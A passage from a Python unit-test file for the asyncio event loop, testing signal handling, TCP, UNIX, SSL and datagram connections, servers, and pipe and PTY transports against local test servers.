nonlocal caught
caught += 1
# Check error behavior first.
self.assertRaises(
TypeError, self.loop.add_signal_handler, 'boom', my_handler)
self.assertRaises(
TypeError, self.loop.remove_signal_handler, 'boom')
self.assertRaises(
ValueError, self.loop.add_signal_handler, signal.NSIG+1,
my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, signal.NSIG+1)
self.assertRaises(
ValueError, self.loop.add_signal_handler, 0, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, 0)
self.assertRaises(
ValueError, self.loop.add_signal_handler, -1, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, -1)
self.assertRaises(
RuntimeError, self.loop.add_signal_handler, signal.SIGKILL,
my_handler)
# Removing SIGKILL doesn't raise, since we don't call signal().
self.assertFalse(self.loop.remove_signal_handler(signal.SIGKILL))
# Now set a handler and handle it.
self.loop.add_signal_handler(signal.SIGINT, my_handler)
os.kill(os.getpid(), signal.SIGINT)
test_utils.run_until(self.loop, lambda: caught)
# Removing it should restore the default handler.
self.assertTrue(self.loop.remove_signal_handler(signal.SIGINT))
self.assertEqual(signal.getsignal(signal.SIGINT),
signal.default_int_handler)
# Removing again returns False.
self.assertFalse(self.loop.remove_signal_handler(signal.SIGINT))
@unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
def test_signal_handling_while_selecting(self):
# Test with a signal actually arriving during a select() call.
caught = 0
def my_handler():
nonlocal caught
caught += 1
self.loop.stop()
self.loop.add_signal_handler(signal.SIGALRM, my_handler)
signal.setitimer(signal.ITIMER_REAL, 0.01, 0) # Send SIGALRM once.
self.loop.run_forever()
self.assertEqual(caught, 1)
@unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
def test_signal_handling_args(self):
some_args = (42,)
caught = 0
def my_handler(*args):
nonlocal caught
caught += 1
self.assertEqual(args, some_args)
self.loop.add_signal_handler(signal.SIGALRM, my_handler, *some_args)
signal.setitimer(signal.ITIMER_REAL, 0.1, 0) # Send SIGALRM once.
self.loop.call_later(0.5, self.loop.stop)
self.loop.run_forever()
self.assertEqual(caught, 1)
def _basetest_create_connection(self, connection_fut, check_sockname=True):
tr, pr = self.loop.run_until_complete(connection_fut)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.assertIs(pr.transport, tr)
if check_sockname:
self.assertIsNotNone(tr.get_extra_info('sockname'))
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def test_create_connection(self):
with test_utils.run_test_server() as httpd:
conn_fut = self.loop.create_connection(
lambda: MyProto(loop=self.loop), *httpd.address)
self._basetest_create_connection(conn_fut)
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_connection(self):
# Issue #20682: On Mac OS X Tiger, getsockname() returns a
# zero-length address for UNIX socket.
check_sockname = not osx_tiger()
with test_utils.run_test_unix_server() as httpd:
conn_fut = self.loop.create_unix_connection(
lambda: MyProto(loop=self.loop), httpd.address)
self._basetest_create_connection(conn_fut, check_sockname)
def test_create_connection_sock(self):
with test_utils.run_test_server() as httpd:
sock = None
infos = self.loop.run_until_complete(
self.loop.getaddrinfo(
*httpd.address, type=socket.SOCK_STREAM))
for family, type, proto, cname, address in infos:
try:
sock = socket.socket(family=family, type=type, proto=proto)
sock.setblocking(False)
self.loop.run_until_complete(
self.loop.sock_connect(sock, address))
except:
pass
else:
break
else:
assert False, 'Can not create socket.'
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop), sock=sock)
tr, pr = self.loop.run_until_complete(f)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def check_ssl_extra_info(self, client, check_sockname=True,
peername=None, peercert={}):
if check_sockname:
self.assertIsNotNone(client.get_extra_info('sockname'))
if peername:
self.assertEqual(peername,
client.get_extra_info('peername'))
else:
self.assertIsNotNone(client.get_extra_info('peername'))
self.assertEqual(peercert,
client.get_extra_info('peercert'))
# test SSL cipher
cipher = client.get_extra_info('cipher')
self.assertIsInstance(cipher, tuple)
self.assertEqual(len(cipher), 3, cipher)
self.assertIsInstance(cipher[0], str)
self.assertIsInstance(cipher[1], str)
self.assertIsInstance(cipher[2], int)
# test SSL object
sslobj = client.get_extra_info('ssl_object')
self.assertIsNotNone(sslobj)
self.assertEqual(sslobj.compression(),
client.get_extra_info('compression'))
self.assertEqual(sslobj.cipher(),
client.get_extra_info('cipher'))
self.assertEqual(sslobj.getpeercert(),
client.get_extra_info('peercert'))
self.assertEqual(sslobj.compression(),
client.get_extra_info('compression'))
def _basetest_create_ssl_connection(self, connection_fut,
check_sockname=True,
peername=None):
tr, pr = self.loop.run_until_complete(connection_fut)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.assertTrue('ssl' in tr.__class__.__name__.lower())
self.check_ssl_extra_info(tr, check_sockname, peername)
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def _test_create_ssl_connection(self, httpd, create_connection,
check_sockname=True, peername=None):
conn_fut = create_connection(ssl=test_utils.dummy_ssl_context())
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
# ssl.Purpose was introduced in Python 3.4
if hasattr(ssl, 'Purpose'):
def _dummy_ssl_create_context(purpose=ssl.Purpose.SERVER_AUTH, *,
cafile=None, capath=None,
cadata=None):
"""
A ssl.create_default_context() replacement that doesn't enable
cert validation.
"""
self.assertEqual(purpose, ssl.Purpose.SERVER_AUTH)
return test_utils.dummy_ssl_context()
# With ssl=True, ssl.create_default_context() should be called
with mock.patch('ssl.create_default_context',
side_effect=_dummy_ssl_create_context) as m:
conn_fut = create_connection(ssl=True)
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
self.assertEqual(m.call_count, 1)
# With the real ssl.create_default_context(), certificate
# validation will fail
with self.assertRaises(ssl.SSLError) as cm:
conn_fut = create_connection(ssl=True)
# Ignore the "SSL handshake failed" log in debug mode
with test_utils.disable_logger():
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
self.assertEqual(cm.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_ssl_connection(self):
with test_utils.run_test_server(use_ssl=True) as httpd:
create_connection = functools.partial(
self.loop.create_connection,
lambda: MyProto(loop=self.loop),
*httpd.address)
self._test_create_ssl_connection(httpd, create_connection,
peername=httpd.address)
def test_legacy_create_ssl_connection(self):
with test_utils.force_legacy_ssl_support():
self.test_create_ssl_connection()
@unittest.skipIf(ssl is None, 'No ssl module')
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_ssl_unix_connection(self):
# Issue #20682: On Mac OS X Tiger, getsockname() returns a
# zero-length address for UNIX socket.
check_sockname = not osx_tiger()
with test_utils.run_test_unix_server(use_ssl=True) as httpd:
create_connection = functools.partial(
self.loop.create_unix_connection,
lambda: MyProto(loop=self.loop), httpd.address,
server_hostname='127.0.0.1')
self._test_create_ssl_connection(httpd, create_connection,
check_sockname,
peername=httpd.address)
def test_legacy_create_ssl_unix_connection(self):
with test_utils.force_legacy_ssl_support():
self.test_create_ssl_unix_connection()
def test_create_connection_local_addr(self):
with test_utils.run_test_server() as httpd:
port = support.find_unused_port()
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=(httpd.address[0], port))
tr, pr = self.loop.run_until_complete(f)
expected = pr.transport.get_extra_info('sockname')[1]
self.assertEqual(port, expected)
tr.close()
def test_create_connection_local_addr_in_use(self):
with test_utils.run_test_server() as httpd:
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=httpd.address)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
self.assertIn(str(httpd.address), cm.exception.strerror)
def test_connect_accepted_socket(self, server_ssl=None, client_ssl=None):
loop = self.loop
class MyProto(MyBaseProto):
def connection_lost(self, exc):
super().connection_lost(exc)
loop.call_soon(loop.stop)
def data_received(self, data):
super().data_received(data)
self.transport.write(expected_response)
lsock = socket.socket()
lsock.bind(('127.0.0.1', 0))
lsock.listen(1)
addr = lsock.getsockname()
message = b'test data'
response = None
expected_response = b'roger'
def client():
nonlocal response
try:
csock = socket.socket()
if client_ssl is not None:
csock = client_ssl.wrap_socket(csock)
csock.connect(addr)
csock.sendall(message)
response = csock.recv(99)
csock.close()
except Exception as exc:
print(
"Failure in client thread in test_connect_accepted_socket",
exc)
thread = threading.Thread(target=client, daemon=True)
thread.start()
conn, _ = lsock.accept()
proto = MyProto(loop=loop)
proto.loop = loop
f = loop.create_task(
loop.connect_accepted_socket(
(lambda : proto), conn, ssl=server_ssl))
loop.run_forever()
proto.transport.close()
lsock.close()
thread.join(1)
self.assertFalse(thread.is_alive())
self.assertEqual(proto.state, 'CLOSED')
self.assertEqual(proto.nbytes, len(message))
self.assertEqual(response, expected_response)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_ssl_connect_accepted_socket(self):
if (sys.platform == 'win32' and
sys.version_info < (3, 5) and
isinstance(self.loop, proactor_events.BaseProactorEventLoop)
):
raise unittest.SkipTest(
'SSL not supported with proactor event loops before Python 3.5'
)
server_context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
server_context.load_cert_chain(ONLYCERT, ONLYKEY)
if hasattr(server_context, 'check_hostname'):
server_context.check_hostname = False
server_context.verify_mode = ssl.CERT_NONE
client_context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
if hasattr(server_context, 'check_hostname'):
client_context.check_hostname = False
client_context.verify_mode = ssl.CERT_NONE
self.test_connect_accepted_socket(server_context, client_context)
@mock.patch('asyncio.base_events.socket')
def create_server_multiple_hosts(self, family, hosts, mock_sock):
@asyncio.coroutine
def getaddrinfo(host, port, *args, **kw):
if family == socket.AF_INET:
return [(family, socket.SOCK_STREAM, 6, '', (host, port))]
else:
return [(family, socket.SOCK_STREAM, 6, '', (host, port, 0, 0))]
def getaddrinfo_task(*args, **kwds):
return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
unique_hosts = set(hosts)
if family == socket.AF_INET:
mock_sock.socket().getsockbyname.side_effect = [
(host, 80) for host in unique_hosts]
else:
mock_sock.socket().getsockbyname.side_effect = [
(host, 80, 0, 0) for host in unique_hosts]
self.loop.getaddrinfo = getaddrinfo_task
self.loop._start_serving = mock.Mock()
self.loop._stop_serving = mock.Mock()
f = self.loop.create_server(lambda: MyProto(self.loop), hosts, 80)
server = self.loop.run_until_complete(f)
self.addCleanup(server.close)
server_hosts = {sock.getsockbyname()[0] for sock in server.sockets}
self.assertEqual(server_hosts, unique_hosts)
def test_create_server_multiple_hosts_ipv4(self):
self.create_server_multiple_hosts(socket.AF_INET,
['1.2.3.4', '5.6.7.8', '1.2.3.4'])
def test_create_server_multiple_hosts_ipv6(self):
self.create_server_multiple_hosts(socket.AF_INET6,
['::1', '::2', '::1'])
def test_create_server(self):
proto = MyProto(self.loop)
f = self.loop.create_server(lambda: proto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '0.0.0.0')
client = socket.socket()
client.connect(('127.0.0.1', port))
client.sendall(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('sockname'))
self.assertEqual('127.0.0.1',
proto.transport.get_extra_info('peername')[0])
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# close server
server.close()
@unittest.skipUnless(hasattr(socket, 'SO_REUSEPORT'), 'No SO_REUSEPORT')
def test_create_server_reuse_port(self):
proto = MyProto(self.loop)
f = self.loop.create_server(
lambda: proto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
server.close()
test_utils.run_briefly(self.loop)
proto = MyProto(self.loop)
f = self.loop.create_server(
lambda: proto, '0.0.0.0', 0, reuse_port=True)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
server.close()
def _make_unix_server(self, factory, **kwargs):
path = test_utils.gen_unix_socket_path()
self.addCleanup(lambda: os.path.exists(path) and os.unlink(path))
f = self.loop.create_unix_server(factory, path, **kwargs)
server = self.loop.run_until_complete(f)
return server, path
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server(self):
proto = MyProto(loop=self.loop)
server, path = self._make_unix_server(lambda: proto)
self.assertEqual(len(server.sockets), 1)
client = socket.socket(socket.AF_UNIX)
client.connect(path)
client.sendall(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# close server
server.close()
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server_path_socket_error(self):
proto = MyProto(loop=self.loop)
sock = socket.socket()
with sock:
f = self.loop.create_unix_server(lambda: proto, '/test', sock=sock)
with self.assertRaisesRegex(ValueError,
'path and sock can not be specified '
'at the same time'):
self.loop.run_until_complete(f)
def _create_ssl_context(self, certfile, keyfile=None):
sslcontext = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext.options |= ssl.OP_NO_SSLv2
sslcontext.load_cert_chain(certfile, keyfile)
return sslcontext
def _make_ssl_server(self, factory, certfile, keyfile=None):
sslcontext = self._create_ssl_context(certfile, keyfile)
f = self.loop.create_server(factory, '127.0.0.1', 0, ssl=sslcontext)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '127.0.0.1')
return server, host, port
def _make_ssl_unix_server(self, factory, certfile, keyfile=None):
sslcontext = self._create_ssl_context(certfile, keyfile)
return self._make_unix_server(factory, ssl=sslcontext)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, ONLYCERT, ONLYKEY)
f_c = self.loop.create_connection(MyBaseProto, host, port,
ssl=test_utils.dummy_ssl_context())
client, pr = self.loop.run_until_complete(f_c)
client.write(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.check_ssl_extra_info(client, peername=(host, port))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# stop serving
server.close()
def test_legacy_create_server_ssl(self):
with test_utils.force_legacy_ssl_support():
self.test_create_server_ssl()
@unittest.skipIf(ssl is None, 'No ssl module')
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server_ssl(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, ONLYCERT, ONLYKEY)
f_c = self.loop.create_unix_connection(
MyBaseProto, path, ssl=test_utils.dummy_ssl_context(),
server_hostname='')
client, pr = self.loop.run_until_complete(f_c)
client.write(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# stop serving
server.close()
def test_legacy_create_unix_server_ssl(self):
with test_utils.force_legacy_ssl_support():
self.test_create_unix_server_ssl()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_verify_failed(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# no CA loaded
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client)
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(ssl.SSLError,
'(?i)certificate.verify.failed'):
self.loop.run_until_complete(f_c)
# execute the loop to log the connection error
test_utils.run_briefly(self.loop)
# close connection
self.assertIsNone(proto.transport)
server.close()
def test_legacy_create_server_ssl_verify_failed(self):
with test_utils.force_legacy_ssl_support():
self.test_create_server_ssl_verify_failed()
@unittest.skipIf(ssl is None, 'No ssl module')
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server_ssl_verify_failed(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# no CA loaded
f_c = self.loop.create_unix_connection(MyProto, path,
ssl=sslcontext_client,
server_hostname='invalid')
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(ssl.SSLError,
'(?i)certificate.verify.failed'):
self.loop.run_until_complete(f_c)
# execute the loop to log the connection error
test_utils.run_briefly(self.loop)
# close connection
self.assertIsNone(proto.transport)
server.close()
def test_legacy_create_unix_server_ssl_verify_failed(self):
with test_utils.force_legacy_ssl_support():
self.test_create_unix_server_ssl_verify_failed()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_match_failed(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(
cafile=SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# incorrect server_hostname
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client)
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(
ssl.CertificateError,
"hostname '127.0.0.1' doesn't match 'localhost'"):
self.loop.run_until_complete(f_c)
# close connection
proto.transport.close()
server.close()
def test_legacy_create_server_ssl_match_failed(self):
with test_utils.force_legacy_ssl_support():
self.test_create_server_ssl_match_failed()
@unittest.skipIf(ssl is None, 'No ssl module')
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server_ssl_verified(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(cafile=SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# Connection succeeds with correct CA and server hostname.
f_c = self.loop.create_unix_connection(MyProto, path,
ssl=sslcontext_client,
server_hostname='localhost')
client, pr = self.loop.run_until_complete(f_c)
# close connection
proto.transport.close()
client.close()
server.close()
self.loop.run_until_complete(proto.done)
def test_legacy_create_unix_server_ssl_verified(self):
with test_utils.force_legacy_ssl_support():
self.test_create_unix_server_ssl_verified()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_verified(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(cafile=SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# Connection succeeds with correct CA and server hostname.
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client,
server_hostname='localhost')
client, pr = self.loop.run_until_complete(f_c)
# extra info is available
self.check_ssl_extra_info(client, peername=(host, port),
peercert=PEERCERT)
# close connection
proto.transport.close()
client.close()
server.close()
self.loop.run_until_complete(proto.done)
def test_legacy_create_server_ssl_verified(self):
with test_utils.force_legacy_ssl_support():
self.test_create_server_ssl_verified()
def test_create_server_sock(self):
proto = asyncio.Future(loop=self.loop)
class TestMyProto(MyProto):
def connection_made(self, transport):
super().connection_made(transport)
proto.set_result(self)
sock_ob = socket.socket(type=socket.SOCK_STREAM)
sock_ob.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock_ob.bind(('0.0.0.0', 0))
f = self.loop.create_server(TestMyProto, sock=sock_ob)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
self.assertIs(sock, sock_ob)
host, port = sock.getsockname()
self.assertEqual(host, '0.0.0.0')
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
client.close()
server.close()
def test_create_server_addr_in_use(self):
sock_ob = socket.socket(type=socket.SOCK_STREAM)
sock_ob.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock_ob.bind(('0.0.0.0', 0))
f = self.loop.create_server(MyProto, sock=sock_ob)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
f = self.loop.create_server(MyProto, host=host, port=port)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
server.close()
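# Dual-stack test: create_server() with host=None listens on all interfaces,
# then a client connects over IPv4 and over IPv6 in turn on the same port.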
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 not supported or enabled')
def test_create_server_dual_stack(self):
f_proto = asyncio.Future(loop=self.loop)
class TestMyProto(MyProto):
def connection_made(self, transport):
super().connection_made(transport)
f_proto.set_result(self)
try_count = 0
while True:
try:
port = support.find_unused_port()
f = self.loop.create_server(TestMyProto, host=None, port=port)
server = self.loop.run_until_complete(f)
except OSError as ex:
if ex.errno == errno.EADDRINUSE:
try_count += 1
self.assertGreaterEqual(5, try_count)
continue
else:
raise
else:
break
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
proto = self.loop.run_until_complete(f_proto)
proto.transport.close()
client.close()
f_proto = asyncio.Future(loop=self.loop)
client = socket.socket(socket.AF_INET6)
client.connect(('::1', port))
client.send(b'xxx')
proto = self.loop.run_until_complete(f_proto)
proto.transport.close()
client.close()
server.close()
def test_server_close(self):
f = self.loop.create_server(MyProto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
client.close()
server.close()
client = socket.socket()
self.assertRaises(
ConnectionRefusedError, client.connect, ('127.0.0.1', port))
client.close()
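# Datagram endpoint test: the server protocol echoes each datagram back
# prefixed with b'resp:'.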
def test_create_datagram_endpoint(self):
class TestMyDatagramProto(MyDatagramProto):
def __init__(inner_self):
super().__init__(loop=self.loop)
def datagram_received(self, data, addr):
super().datagram_received(data, addr)
self.transport.sendto(b'resp:'+data, addr)
coro = self.loop.create_datagram_endpoint(
TestMyDatagramProto, local_addr=('127.0.0.1', 0))
s_transport, server = self.loop.run_until_complete(coro)
host, port = s_transport.get_extra_info('sockname')
self.assertIsInstance(s_transport, asyncio.Transport)
self.assertIsInstance(server, TestMyDatagramProto)
self.assertEqual('INITIALIZED', server.state)
self.assertIs(server.transport, s_transport)
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop),
remote_addr=(host, port))
transport, client = self.loop.run_until_complete(coro)
self.assertIsInstance(transport, asyncio.Transport)
self.assertIsInstance(client, MyDatagramProto)
self.assertEqual('INITIALIZED', client.state)
self.assertIs(client.transport, transport)
transport.sendto(b'xxx')
test_utils.run_until(self.loop, lambda: server.nbytes)
self.assertEqual(3, server.nbytes)
test_utils.run_until(self.loop, lambda: client.nbytes)
# received
self.assertEqual(8, client.nbytes)
# extra info is available
self.assertIsNotNone(transport.get_extra_info('sockname'))
# close connection
transport.close()
self.loop.run_until_complete(client.done)
self.assertEqual('CLOSED', client.state)
server.transport.close()
def test_create_datagram_endpoint_sock(self):
sock = None
local_address = ('127.0.0.1', 0)
infos = self.loop.run_until_complete(
self.loop.getaddrinfo(
*local_address, type=socket.SOCK_DGRAM))
for family, type, proto, cname, address in infos:
try:
sock = socket.socket(family=family, type=type, proto=proto)
sock.setblocking(False)
sock.bind(address)
except:
pass
else:
break
else:
assert False, 'Cannot create socket.'
f = self.loop.create_connection(
lambda: MyDatagramProto(loop=self.loop), sock=sock)
tr, pr = self.loop.run_until_complete(f)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, MyDatagramProto)
tr.close()
self.loop.run_until_complete(pr.done)
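# A selector-based loop keeps one internal self-pipe fd; closing the loop
# must release it and clear _ssock/_csock.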
def test_internal_fds(self):
loop = self.create_event_loop()
if not isinstance(loop, selector_events.BaseSelectorEventLoop):
loop.close()
self.skipTest('loop is not a BaseSelectorEventLoop')
self.assertEqual(1, loop._internal_fds)
loop.close()
self.assertEqual(0, loop._internal_fds)
self.assertIsNone(loop._csock)
self.assertIsNone(loop._ssock)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_read_pipe(self):
proto = MyReadPipeProto(loop=self.loop)
rpipe, wpipe = os.pipe()
pipeobj = io.open(rpipe, 'rb', 1024)
@asyncio.coroutine
def connect():
t, p = yield from self.loop.connect_read_pipe(
lambda: proto, pipeobj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(0, proto.nbytes)
self.loop.run_until_complete(connect())
os.write(wpipe, b'1')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 1)
self.assertEqual(1, proto.nbytes)
os.write(wpipe, b'2345')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(5, proto.nbytes)
os.close(wpipe)
self.loop.run_until_complete(proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_unclosed_pipe_transport(self):
# This test reproduces the issue #314 on GitHub
loop = self.create_event_loop()
read_proto = MyReadPipeProto(loop=loop)
write_proto = MyWritePipeProto(loop=loop)
rpipe, wpipe = os.pipe()
rpipeobj = io.open(rpipe, 'rb', 1024)
wpipeobj = io.open(wpipe, 'w', 1024)
@asyncio.coroutine
def connect():
read_transport, _ = yield from loop.connect_read_pipe(
lambda: read_proto, rpipeobj)
write_transport, _ = yield from loop.connect_write_pipe(
lambda: write_proto, wpipeobj)
return read_transport, write_transport
# Run and close the loop without closing the transports
read_transport, write_transport = loop.run_until_complete(connect())
loop.close()
# These 'repr' calls used to raise an AttributeError
# See Issue #314 on GitHub
self.assertIn('open', repr(read_transport))
self.assertIn('open', repr(write_transport))
# Clean up (avoid ResourceWarning)
rpipeobj.close()
wpipeobj.close()
read_transport._pipe = None
write_transport._pipe = None
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
# Issue #20495: The test hangs on FreeBSD 7.2 but passes on FreeBSD 9
@support.requires_freebsd_version(8)
def test_read_pty_output(self):
proto = MyReadPipeProto(loop=self.loop)
master, slave = os.openpty()
master_read_obj = io.open(master, 'rb', 0)
@asyncio.coroutine
def connect():
t, p = yield from self.loop.connect_read_pipe(lambda: proto,
master_read_obj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(0, proto.nbytes)
self.loop.run_until_complete(connect())
os.write(slave, b'1')
test_utils.run_until(self.loop, lambda: proto.nbytes)
self.assertEqual(1, proto.nbytes)
os.write(slave, b'2345')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(5, proto.nbytes)
os.close(slave)
self.loop.run_until_complete(proto.done)
self.assertEqual(
